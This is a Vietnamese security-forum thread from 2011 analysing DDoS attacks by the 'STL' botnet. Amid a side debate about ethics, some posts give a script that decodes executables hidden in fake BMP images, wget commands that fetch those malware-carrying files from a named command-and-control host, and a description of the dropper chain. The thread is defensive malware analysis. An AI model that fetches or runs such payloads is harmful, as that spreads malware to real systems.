[Minus]    0    [Plus]
Joined: 04/01/2005 04:58:30
Messages: 563
Offline
[Profile] [PM]

conmale wrote:

myquartz wrote:
Không ngờ nhiều hacker non trẻ ngoài tay nghề IT ra mà ngón nghề chửi cũng không thua gì các bậc tiền bối ngoài chợ.
A-di-đà-Phật, thiện tai, thiện tai. Thôi thì quảng gánh lo đi mà vui sống các bác ạ, dẫu phận đời đen bạc, thật giả lẫn lộn... 


Lạ thiệt. Những trò ăn cắp, lừa đảo, xâm phạm máy tính cá nhân, phát tán virus, tấn công từ chối dịch vụ..v...v.. đó là chưa kể những trò "bạch hoá" bằng cách thêu dệt, bêu rếu, lăng nhục kẻ khác đều là những trò không những vi phạm pháp luật trầm trọng mà còn là những hành vi phi đạo đức, vậy mà từ trước đến giờ bạn myquartz có bao giờ lên tiếng phê bình những trò bại hoại này đâu? Trái lại, những kẻ phê phán (hoặc chửi bới) những trò bại hoại ấy thì bạn myquartz lại nhảy vô mà chụp cái mũ "nghề chửi"? Bạn đang gián tiếp cho rằng những việc làm bại hoại kia không đáng để chửi và những người đang chửi những việc bại hoại là đáng khinh bỉ?

Bạn có bị đụng chạm, bị tấn công, bị hư hại, bị mất mác đâu mà không thản nhiên? Bạn nghĩ rằng ai đó phá hoại bạn, phá hoại cả một cộng đồng bằng đủ thứ trò thô bỉ và ti tiện đi chăng nữa cũng nên "quảng gánh lo đi mà vui sống"? Xin lỗi bạn, đối với tớ, đây cũng chỉ là một thứ lập luận bullshit. Phận đời đen bạc khỉ gì đây? Ở đây chỉ có một bọn phá hoại bao nhiêu năm nay nhưng tất cả các cơ quan chức năng, báo chí, thông tin đều làm ngơ và một bọn chống lại bọn phá hoại bằng khả năng và điều kiện ít ỏi mà thôi. Ai đó tới nhà bạn, đập phá nhà bạn, bêu rếu bạn và bạn cắn răng mà ta thán rằng "phận đời đen bạc" rồi cam chịu? Xin lỗi bạn, đây là thái độ bạc nhược hoặc không trung thực (vì con người không phải là những con liu điu chỉ biết cúi đầu chịu hèn).

Tớ không thể tin nổi là cả một quốc gia mà lại hoàn toàn im ắng trước sự tấn công triền miên tới vietnamnet. Chỉ cần hốt một mớ log trên hệ thống của vietnamnet, chọn ra một mớ IP addresses rồi liên hệ với ISP để trace ra máy con bị nhiễm malware. Đến vài nơi để lấy mẫu malware, re xong là liên hệ trực tiếp với data center của masterbot. Chỉ cần lấy tư cách vncert chớ đừng nói chi cơ quan an ninh thì các data center sẵn sàng cung cấp thông tin cần thiết. Chộp ra 1 ông thì cách gì mà không lòi ra cả đám?

Những phê phán về khía cạnh đạo đức ở đây trực tiếp đi từ những kết quả kỹ thuật mà ra. Kỹ thuật cũng có đạo đức và phi đạo đức. Kỹ thuật mà không có yếu tố đạo đức thì chẳng khác gì những thằng người máy làm theo chương trình ấn định sẵn. Hãy làm con người và đừng làm người máy! 


Kính bác, em ko ngờ bác lại viết ... dài đến thế.
Hehe, quan điểm của em đơn giản lắm, có thể gọi là mũ ni che tai cũng được, nhưng thực dụng và không làm gì tốn công vô ích. Em theo đạo Phật nửa mùa và hiểu 1 số điều: có nhân và có quả. Gieo gió ắt gặt bão. Từ lâu em đã quan niệm XH Internet là 1 kiểu tương tác của XH loài người, sẽ có người tốt, người xấu và đó là 2 cái thiện ác đấu tranh cùng tồn tại như Phật đã dạy. Như thế đi chửi XH nó đầy người xấu cũng như lên Internet chửi bọn xấu thôi, vô ích, tốn nước bọt. XH phải có người xấu và phải có như thế mới tồn tại XH. Và hơn nữa, trong 1 người có thể tồn tại cả 2 hình thái thiện/ác, tốt/xấu lẫn lộn đó. Người chửi STL tưởng là mình làm việc tốt nhưng cái xấu chính là việc "chửi", ngược lại STL làm nhiều chuyện xằng bậy trên Internet nhưng chắc họ cũng có mặt tốt nào đó mà chúng ta ko biết.

Dù sao em cũng vẫn theo sát topic của bạn TQN, xem xem có gì mới trong kỹ thuật của STL để mà học hỏi. Kiến thích này có ích nha, áp dụng nó vào công việc => giảm nguy cơ bảo mật => thu lợi (vì người ta đang thuê mình bảo vệ công việc kinh doanh - ko phải bảo vệ chính trị đâu nha). Em nghĩ các bạn kỹ thuật nên tập trung vào kỹ thuật để học hỏi hơn là phán xét chửi rủa.

P/S: chú thích thêm tí đại ý của em là lên Internet là phải chấp nhận một môi trường không an toàn, luật lệ lỏng lẻo, đầy DDOS, đầy rẫy virus hay lắm kẻ nhòm ngó. Sống chung với lũ và biết cách chế ngự nó, đề phòng, tránh nó hơn là ngồi đó than vãn, quy chụp người Việt thế này, yêu nước thế kia...
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 17/08/2011 00:39:43 (+0700) | #440 | 245146
mv1098
Member

[Minus]    0    [Plus]
Joined: 18/07/2009 14:19:13
Messages: 119
Offline
[Profile] [PM]
bonus thêm cái pic các bác nhìn xem nó ở đâu




[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 17/08/2011 01:11:12 (+0700) | #441 | 245147
kutruoi
Locked

[Minus]    0    [Plus]
Joined: 15/08/2011 12:47:31
Messages: 22
Offline
[Profile] [PM]

em thấy quan trọng nhất vẫn là RC mã malware bọn này rồi nhanh chóng thông bao cho các AV để họ cập nhật và diệt đám botnet này. việc hôm nay chúng đặt ở một vài host bên tàu, mai chúng đặt bên nga, ngày kia chúng đặt bên đức các file giao lệnh thì cũng là chuyện đương nhiên. bọn này chắc kô ngu đến nỗi đặt các files nhiệm vụ đó ở các server việt nam. cho nên iem nghĩ việc forensic theo dấu vết các domains rồi mang máng quy kết là đám stl là liên quan đến hacker tàu khựa .v.v. là nghe chừng chưa convinced cho lắm. việc liên lạc hoạc down những server chứa các fai tác nghiệp kia cũng rất quan trọng, nhưng kết luận là có sự tham gia của bọn tàu , bọn tây là kô ổn. em mạo muội tự suy diễn là stl là đám việt nam đang muốn loại bỏ HVA vì lý do thương mại và thương hiệu mà thôi.

smilie


mời bạn ghé xem site này hay quá ! http://danlambaovn.blogspot.com
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 17/08/2011 02:11:35 (+0700) | #442 | 245150
PXMMRF
Administrator

Joined: 26/09/2002 07:17:55
Messages: 946
Offline
[Profile] [PM]

TQN wrote:
Tới ngày hôm nay, 16-08-2011, host map.priper.info không còn trả về flower.bmp và aqua.bmp nữa, nginx trả về "404 Not Found".
Kiểm tra trên robtex.com, thấy có điều lạ là host: E9tn.com lại có cùng IP với map.priper.info. Cái này thì em không hiểu, các bác rành về network giải thích giùm em.
...................................
 


Website-webserver map.priper.info sử dụng IP tĩnh là 208.115.200.206, đặt tại Dalas, TX, USA
Hostname (resolved) là 206-200-115-208.static.reverse.lstn.net. Webserver này hiện chỉ hosting 1 website là
map.priper.info. Chú y vào lúc này webserver chỉ mở cổng 8080 TCP (Nghĩa là web server NGINX version 1.10 đươc config. tai cổng nói trên)

Còn E9tn.com sử dụng IP tĩnh 184.22.201.232, webserver cũng đặt tại USA. Hiện webserver inactive (offline).
Ngoài E9tn.com, còn có khoảng 8 đến 9 website khác cũng hosting trên webserver này, như mantean-enfants.com, pp3x.info...

Người (hay tổ chức) sở hữu domain E9tn.com đúng là "DAHAI HUANG". Ngoài domai này "DAHAI HUANG" còn quản lý khoảng 3939 domain khác.
The absence of disagreement is not harmony, it's apathy.
(Socrates)
Honest disagreement is often a good sign of progress.
(Mahatma Gandhi)
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 17/08/2011 07:11:48 (+0700) | #443 | 245153
[Avatar]
conmale
Administrator

Joined: 07/05/2004 23:43:15
Messages: 9353
Location: down under
Offline
[Profile] [PM]
Chào anh PXMMRF,

Botnet của stl sử dụng một file chứa một đống User-Agents và hiệu lệnh để tấn công. Zombies có thể được gán random User-Agents hoặc một User-Agent cố định nào đó. Botnet của stl không tuân thủ các ấn định chung cho "crawler" thông thường. Chúng không hề thăm dò "robots.txt" mà chỉ đập thẳng vô các URI nào đó và từ đó tiếp tục crawl sâu vô trong. Bởi vậy mới tạo tác hại lớn.

Với bots của stl, cho dù các zombies có check "robots.txt", việc áp dụng ACAP cũng không có tác dụng gì cả bởi vì zombies sử dụng low-level socket API để tạo requests đến mục tiêu. Ở level này, những ấn định và ứng dụng có trên trình duyệt hẳn hòi (như IE, FF, Chrome....) hoặc ở các crawlers thật thụ đều không có ý nghĩa đối với zombies stl.

@ TQN: thật ra các websites và blogs bị stl "dán bùa" lên thì ít nhất 70% là của người Việt trong nước chớ chẳng phải của người Việt ở nước ngoài. Ở Việt Nam, từ năm 2007 đã có những bài báo có tiêu đề "An ninh mạng và pháp lý sẽ được củng cố" và từ đó tới giờ đã hơn 4 năm, vẫn chưa thấy củng cố gì hết. Việt Nam vẫn chưa có một cái khung pháp lý cụ thể về an ninh mạng và cách xử lý với những vi phạm.

@ myquartz:
Người chửi STL tưởng là mình làm việc tốt nhưng cái xấu chính là việc "chửi", ngược lại STL làm nhiều chuyện xằng bậy trên Internet nhưng chắc họ cũng có mặt tốt nào đó mà chúng ta ko biết.  

Chuyện "mặt tốt" của stl thế nào "chúng ta ko biết" nhưng lại cố lôi cái "không biết" đó ra để bào chữa, trong khi những chuyện "xằng bậy" kia bị chửi thì cho là hành động chửi là xấu? Bạn lý luận đầy nguỵ biện và không có nền tảng tí nào. Làm sao bạn có thể dựa vào những "cái tốt" mơ hồ nào đó để làm đối trọng với "cái xấu" (hành động chửi) ở đây?

Việc bạn cảm thấy chủ đề này ích lợi về mặt kỹ thuật, đó là chuyện của bạn nhưng bạn không nên vin vào lý do kỹ thuật để phê phán những phát biểu về mặt đạo đức. Chừng nào bạn có thể chứng minh được những việc làm "tốt" của stl thì lúc ấy, bạn có thể dùng nó để phê phán việc "chửi".

Tôi không hề "ngồi than vãn" mà tôi đã và đang làm những việc thực tế. Tôi không quy chụp ai bất cứ điều gì và tôi chưa hề đề cập hai chữ "yêu nước" gì ở đây hết. Chính bạn mới là kẻ quy chụp, hiểu sai và bóp méo vấn đề.
What bringing us together is stronger than what pulling us apart.
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 17/08/2011 08:26:42 (+0700) | #444 | 245160
TQN
Elite Member

[Minus]    0    [Plus]
Joined: 29/06/2006 22:28:01
Messages: 888
Location: Biết làm chi ?
Offline
[Profile] [PM] [WWW] [Yahoo!]
Đây là một tổ chức nằm trong "bóng tối", được "bảo kê", và chúng ta dù biết chúng là ai thì chỉ dựa vào kết quả RE, forensics... thì cũng không đủ chứng cứ hay tìm ra đích danh tên tuổi ngoài đời của chúng đầy đủ được.
Hơn nữa, nếu chúng ta "bạch hoá" chúng, không khéo chúng ta còn bị lên đâu đó ngồi viết tường trình, làm khó làm dể, lục soát, điều tra... nữa thì khổ lắm smilie
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 17/08/2011 10:49:12 (+0700) | #445 | 245171
texudo
Member

[Minus]    0    [Plus]
Joined: 20/07/2011 11:14:04
Messages: 31
Offline
[Profile] [PM]
DDOS phòng rất khó, nếu mạng botnet mô phỏng đúng các behaviors của người lướt web thì site bị tấn công chỉ còn cách chịu trận mà thôi. (ngay cả HVA cũng thế, trừ khi anh lọc IP hoặc close website).

Như anh conmale đề cập bài trên, thì STL chọc vào 1 page rồi từ page đó sẽ có các link tới pages khác của site hiện tại, crawl tiếp vào các links này...mức độ thiệt hại của website sẽ càng nặng nề hơn.


[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 17/08/2011 11:47:47 (+0700) | #446 | 245173
TQN
Elite Member

[Minus]    0    [Plus]
Joined: 29/06/2006 22:28:01
Messages: 888
Location: Biết làm chi ?
Offline
[Profile] [PM] [WWW] [Yahoo!]
Gởi mấy anh stl đoạn script này đọc chơi cho đỡ buồn:
Code:
//------------------------------------------------------------------------------------------------
//--- 010 Editor v3.2 Script File
//
// File: DecodeBin.1sc
// Author: ThangCuAnh (TQN) 
// Revision: 1.1
// Purpose: Decode and extract the embedded PE files in decoded files from plxzyin0fx.bmp,
// BlueSphere.bmp, aqua.bmp
//------------------------------------------------------------------------------------------------
char Mask[] = "ï¾­ÞNullsoftInst '";
char strBin[255];

int i, j, iFiles, curFile, newFile;
int64 liPos, fSize;

// Check that a file is open
if (FileCount() == 0)
{
    MessageBox(idOk, "DecodeBin", "DecodeBin can only be executed when a file is loaded.");
    return -1;
}

// Save the file index of current file
curFile = GetFileNum();

// Find the embedded PE files
liPos = FindFirst(Mask);
if (liPos < 0)
{
    MessageBox(idOk, "DecodeBin", "Could not find the mask of embedded PE files");
    return -1;
}

liPos += 20;
iFiles = ReadInt(liPos);
liPos += sizeof(int);

Printf("Number of embedded PE files %d - Start at 0x%LX", iFiles, liPos);

for (i = 0; i < iFiles; ++i)
{
    fSize = ReadInt(liPos);
    liPos += sizeof(int);
    SetSelection(liPos, fSize);
    CopyToClipboard();

    newFile = FileNew();
    FileSelect(newFile);    // force select new file
    PasteFromClipboard();

    // Decode the new file
    for (j = 0; j < FileSize(); ++j)
    {
        // Modify the current byte
        WriteUByte(j, ReadUByte(j) ^ (( j & 3) + 0x4D));
    }
    SPrintf(strBin, "File%d.bin", i + 1);
    strBin = InputSaveFileName("Save decoded PE as", "All files (*.*)", strBin, ".bin");
    FileSave(strBin);

    // Switch to old file
    FileSelect(curFile);

    // Seek to next embedded PE file
    liPos += fSize;
}


Hiên tại chỉ có speed.cyline.org:443 của mấy anh là còn hoạt động, nhả về flower.bmp và plxzyin0fx.bmp. Còn cái map.priper.info thì mấy anh tạm dừng nó làm chi vậy, chỉ giáo cho em biết với smilie
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 17/08/2011 12:08:23 (+0700) | #447 | 245174
TQN
Elite Member

[Minus]    0    [Plus]
Joined: 29/06/2006 22:28:01
Messages: 888
Location: Biết làm chi ?
Offline
[Profile] [PM] [WWW] [Yahoo!]
Tiếp tục nào anh em, chúng ta sẽ đi download, decode và extract, phân tích các .exe, .dll files từ file mạo danh bmp, dùng kỹ thuật che giấu thông tin trong ảnh bmp của stl.
Post lên để anh em cùng tham gia theo dõi và phân tích các biến thể mới của các con bot nằm vùng của stl.
Đầu tiên, làm cái gì cũng phải có tool, làm bằng tay thì không được đâu:
1. Wget: link download tui đã post, anh em chịu khó down về, để dành xài luôn. Không có nó cũng được, dùng ngay brower hiện tại vẫn down được các file .bmp của stl.
2. 1 trình HexEditor: Em thì vẫn khoái nhất là 010 Editor và FileInsight. 010 Editor support mọi thứ mà WinHex, HexWorkshop có. Hơn nữa, nó có tính năng template parser và script rất mạnh. Vì vậy em dùng thằng này là chính. Anh em có thể lên http://www.exelab.ru down về, hay download bản em đang dùng từ http://www.mediafire.com/?f2zvdmjabph1dwg
Các software, tool nho nhỏ mà em đang dùng thì đa số đều được em make thành portable, chả cần install gì cả. Cứ chép vào thư mục nào đó, chỉnh sữa file .reg theo đường dẫn mới, đăng ký nó là xong.

Ngoài ra, IDA Pro v6.1 và OllyDbg cũng cần, nhưng chắc các bạn đã có các tool này. Không có cũng không sao.
Các tool và scrip để decode file của stl em đã post tại đây: http://www.mediafire.com/?5g7r7c8eme0wjp2

Như chúng ta đã biết, thằng nằm vùng download bmp file về và decode, extract ra bot nằm vùng của stl là hai ông nội đáng ghét: uxtheme.manifest và themeui.manifest. Hai ông nội giả danh này sẽ liên tục download các file bmp từ map.priper.info:8080 và speed.cyline.org:443. Chúng ta sẽ không dùng 2 file manifest này để download mà dùng chính wget hay brower ta đang dùng để download các file bmp này về để phân tích.
File uxtheme.manifest sẽ download flower.bmp từ 1 trong 2 host trên về. File flower.bmp chỉ chứa thông tin về một file bmp lớn hơn, che giấu các con downloader nằm vùng trong đó. Các con downloader này sẽ tiếp tục download con bot về.
Do map.priper.info đã ngưng hoạt động, web server Nginx của nó cứ trả về not found, nên ta sẽ tập trung trên speed.cyline.org, port 443.
Đầu tiên, wget file bmp về cái đã:
Code:
wget "http://speed.cyline.org:443/flower.bmp?g={1CD70F27-EA66-4812-834C-FB39AE2DC170}&c=1&v=1&tf=312218282815&tr=312218282861&t=312218282864&p=2&e=0&n=ThangChaMayTuiSTL&u=OngNoiMayNe&lfhbbnwdbywxlineyegfswjxylrktvvfjqlr=vznmbfhxpgocvojqhosgdbenhrjtnglagonsvca"



Chú ý: nếu ta chỉ wget http://speed.cyline.org:443/flower.bmp không thì chúng ta vẫn được flower.bmp, nhưng flower.bmp có một số thông tin khác với flower.bmp lấy theo URL trên. Nhưng không quan trong. Các thông tin đó gồm size, Checksum, flag, tính hợp lệ... mà stl coder quy định trong các file flower.bmp. Tuỳ theo URL mà Nginx sẽ trả về file nào.
Nhưng mấy anh stl ơi, khác mấy field đó thì quan trọng gì, cái em cần là size và URL để download cái bmp lớn kìa smilie

Tiếp tục, chúng ta đã có cái file flower.bmp với cái name dài ngoằng (vì em lười không quy định thông số output file name cho wget), nên ta cứ rename lại thành flower.bmp.

Tiếp theo, chúng ta sẽ dùng tool DecodeBmp.exe để decode thông tin che giấu trong file bmp này:



Mở file flower.bin với 010 Editor, chúng ta sẽ thấy link để download file bmp lớn, size, tên .tmp file để download về:





Để ý nhé các bạn, size = 24 6A 04 00 tức = 0x00046A24, = 289316. Đây chính là size của file EXE nhúng trong larger bmp, trong trường hợp hiện nay là plxzyin0fx.bmp.

Tiếp tục download plxzyin0fx.bmp:
Code:
wget http://speed.cyline.org:443/plxzyin0fx.bmp?dl=1&oyeerpsaahqumkthxeswvwlfdxpizmffsfk=njhkmdjqlnkwmrofymzmxgqf

Ta được file plxzyin0fx.bmp với cái đuôi dài loằng ngoằng. Rename thành plxzyin0fx.bmp.
Chú ý, nếu ta: wget http://speed.cyline.org:443/plxzyin0fx.bmp thì vẫn được file plxzyin0fx.bmp y như trên, không khác 1 tý gì (dùng fc.exe của Windows để compare). Đây là một bug của stl coder cho Nginx webserver.



Về trình compare, tui đang dùng Araxis Merge và WinMerge. Các bạn có thể dùng bất kỳ trình file compare nào cũng được, fc.exe là tiện ích có sẵn của Windows, nằm trong System32.
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 17/08/2011 12:31:17 (+0700) | #448 | 245175
PXMMRF
Administrator

Joined: 26/09/2002 07:17:55
Messages: 946
Offline
[Profile] [PM]

conmale wrote:
Chào anh PXMMRF,

Botnet của stl sử dụng một file chứa một đống User-Agents và hiệu lệnh để tấn công. Zombies có thể được gán random User-Agents hoặc một User-Agent cố định nào đó. Botnet của stl không tuân thủ các ấn định chung cho "crawler" thông thường. Chúng không hề thăm dò "robots.txt" mà chỉ đập thẳng vô các URI nào đó và từ đó tiếp tục crawl sâu vô trong. Bởi vậy mới tạo tác hại lớn.

Với bots của stl, cho dù các zombies có check "robots.txt", việc áp dụng ACAP cũng không có tác dụng gì cả bởi vì zombies sử dụng low-level socket API để tạo requests đến mục tiêu. Ở level này, những ấn định và ứng dụng có trên trình duyệt hẳn hòi (như IE, FF, Chrome....) hoặc ở các crawlers thật thụ đều không có ý nghĩa đối với zombies stl.

@ TQN: thật ra các websites và blogs bị stl "dán bùa" lên thì ít nhất 70% là của người Việt trong nước chớ chẳng phải của người Việt ở nước ngoài. Ở Việt Nam, từ năm 2007 đã có những bài báo có tiêu đề "An ninh mạng và pháp lý sẽ được củng cố" và từ đó tới giờ đã hơn 4 năm, vẫn chưa thấy củng cố gì hết. Việt Nam vẫn chưa có một cái khung pháp lý cụ thể về an ninh mạng và cách xử lý với những vi phạm.
................................................................................. 


Cám ơn bài viết làm rõ vấn đề của anh conmale

File liệt kê các User Agents đươc bot mới (ta còn chưa biết) của STL sử dụng để update User Agent chắc cũng tương tự (tương tự thôi) như file User_Agent.txt trong Malzilla. (Khi cài Malzilla trên các OS Windows server , như Win 2K3 thì việc lưa chọn User Agent theo ý người sử dụng soft. mới thưc hiện được. Còn cài Malzilla trên các OS khác như Win XP thì dường như tiện ích này không thưc hiện được)

Tuy nhiên, theo tôi cho dù STL virus-trojan có một file User Agent.txt như nói ở trên, thì nó vẫn phải có một tool hay codes để change user agent string default trong các trình duyệt IE, FF....
Vì nếu không customize (tức là change) User agent string trong IE, FF thì các trình duyệt này vẫn gửi các gói tin DDoS đên mục tiêu với User Agent string măc định của trình duyệt, thí dụ:

Mozilla/5.0 (X11; Linux x86_64; rv:5.0) Gecko/20100101 Firefox/5.0 Firefox/5.0
Mozilla/5.0 (Windows NT 5.1; U; rv:5.0) Gecko/20100101 Firefox/5.0 ............

Trên nền Windows, tool nói trên,nếu có, chắc phải thưc hiện các bước công việc trình tư đại thể như sau:

Command Prompt---->GPEDIT.MSC -->User Configuration -> Windows Settings -> Internet Explorer Maintenance -> Connection--->User Agent String--->Customize string --->insert new User Agent string (chọn cố định hay chọn random một User Agent string trong file "User Agent.txt" nói trên)-->OK

texudo wrote:
Như anh conmale đề cập bài trên, thì STL chọc vào 1 page rồi từ page đó sẽ có các link tới pages khác của site hiện tại, crawl tiếp vào các links này...mức độ thiệt hại của website sẽ càng nặng nề hơn. 


Các header trong các gói tin của STL DDoS đến muc tiêu như vừa qua thì không thể nào tạo nên hiệu quả crawling các link hiện hiện trên URL bị DDoS vào. Muốn crawling thì phải có thêm những command cần thiết kèm với header.




The absence of disagreement is not harmony, it's apathy.
(Socrates)
Honest disagreement is often a good sign of progress.
(Mahatma Gandhi)
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 17/08/2011 13:10:05 (+0700) | #449 | 245179
texudo
Member

[Minus]    0    [Plus]
Joined: 20/07/2011 11:14:04
Messages: 31
Offline
[Profile] [PM]
Các header trong các gói tin của STL DDoS đến muc tiêu như vừa qua thì không thể nào tạo nên hiệu quả crawling các link hiện hiện trên URL bị DDoS vào. Muốn crawling thì phải có thêm những command cần thiết kèm với header. " 


Theo em hiểu thì mục đích thay đổi User Agents là để Server host website tạo một thread mới.
Vì với một user khi dùng một browser để request tới Server thì họ sẽ chỉ có một User Agent duy nhất mà thôi. Việc STL thay đổi nhiều User Agents mục đích là để làm "LỤT" Server với quá nhiều thread được sinh ra....Không biết em hiểu có đúng không?


Như anh conmale đề cập bài trên, thì STL chọc vào 1 page rồi từ page đó sẽ có các link tới pages khác của site hiện tại, crawl tiếp vào các links này...mức độ thiệt hại của website sẽ càng nặng nề hơn.  


-> Ý em là crawler khi craw vào một page nào đó, nó sẽ dectect luôn các INTERNAL Urls của site đó và tiếp tục crawl vào các INTERNAL Urls. Còn việc thay đổi User Agents thì chắc là sẽ tạo thêm hiểu quả rồi.

[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 17/08/2011 13:14:32 (+0700) | #450 | 245182
TQN
Elite Member

[Minus]    0    [Plus]
Joined: 29/06/2006 22:28:01
Messages: 888
Location: Biết làm chi ?
Offline
[Profile] [PM] [WWW] [Yahoo!]
Tiếp tục nào anh em, vừa gõ, vừa capture hình, vừa upload mệt quá.
Các file BlueSphere.bmp, aqua.bmp, plxzyin0fx.bmp, flower.bmp đều dùng chung một thuật toán che giấu thông tin trong ảnh bmp (tiếng Anh là stegoxxx gì đó tự nhiên em quên mất tiêu rồi), nên ta tiếp tục dùng tool DecodeBmp.exe (của ông nội ThangCuAnh viết đó smilie) để decode file plxzyin0fx.bmp ra file EXE.
Code:
DecodeBmp.exe plxzyin0fx.bmp plxzyin0fx.bin

Được file plxzyin0fx.bin rồi, chúng ta dùng các trình, plugin Overlay cho PE file của PEiD hay 010Editor (hay HexEditor nào cũng được) để set size của file plxzyin0fx.bin về size mà tui đã post.

File plxzyin0fx.bin này là file EXE, trong ruột nó nhúng nhiều file EXE và DLL khác. Khi uxtheme.manifest, themeui.manifest download file larger bmp này về (plxzyin0fx.bmp, aqua.bmp) về, nó sẽ decode trên memory, write xuống .tmp file đã chỉ ra, CreateProcess file temp đó. File temp (plxzyin0fx.bin, aqua.bin) sẽ tiếp tục extract ra TeamViewer.exe, hay TeamViewer_Desktop.exe, uxtheme.manifest hay themeui.manifest. Hai ông nội manifest này sẽ tiếp tục download bot mới cũng mạo danh bmp từ host khác về và execute tương tự như các bước trên: cũng download bmp file, extract data từ bmp, write xuống temp file, CreateProcess temp file đó....
[Up] [Print Copy]
[digg] [delicious] [google] [yahoo] [technorati] [reddit] [stumbleupon]
Go to: 
 Users currently in here 
3 Anonymous

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|